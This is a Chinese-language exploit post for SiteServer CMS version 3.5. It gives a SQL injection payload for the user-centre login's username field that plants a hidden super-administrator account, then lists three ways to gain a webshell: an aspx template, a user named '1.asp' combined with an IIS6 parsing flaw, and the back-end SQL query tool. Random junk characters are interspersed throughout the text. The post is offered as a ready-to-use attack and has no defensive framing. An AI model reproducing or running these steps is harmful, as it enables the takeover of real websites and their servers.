经测试秒杀最新的3.5版
) h# ~, G- ?; Zstieserver官网:www.siteserver.cn! Y# c, h/ M* K7 @
EXP:
1 v5 N+ B7 Y& G y- j7 {3 T直接访问UserCenter/login.aspx6 |, f5 A8 f2 c7 v6 H) @
用户名处输入:
/ h( G6 j/ N! j7 w# ^; F7 J! R/ v* v" K' \4 k
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–! ], q3 ?' J: r( I S! v1 o/ l6 u, s
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
5 E( M! ] M; g8 n: }- F3 C, T之后再访问后台SiteServer/login.aspx用插入的用户登陆
8 N( @# Z3 G9 P I后台拿webshell的三种方法:
# { t+ F* f @/ p一、
+ a4 {: t' {& u0 j! E, H' c站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
5 _3 [3 f) F' m- [. l6 U2 N1 U3 A二、
9 ~5 M/ X- T* Z" p; @! \( I成员权限-》添加用户-》用户名为:1.asp
2 m) G+ V+ b3 P8 g) T3 t+ n Uhttp://127.0.0.1/usercenter/5 T8 _% ~5 g" z; K* R: X0 L
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
; S2 d) ]% ?. D# k(ps:后台添加用户时不会验证是否含有非法字符)
! D! N' n) E+ ]5 c/ C三、9 l9 m; O$ w4 _( a& m
系统工具-》实用工具-》机器参数查看$ l2 n X# u) ~
可以看到数据库类型、名称,WEB路径2 G' x8 Q4 I/ I& _6 C) \& y' j( {
系统工具-》数据库工具-》SQL语句查询
6 {- N8 v7 u* p. W7 _% S这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |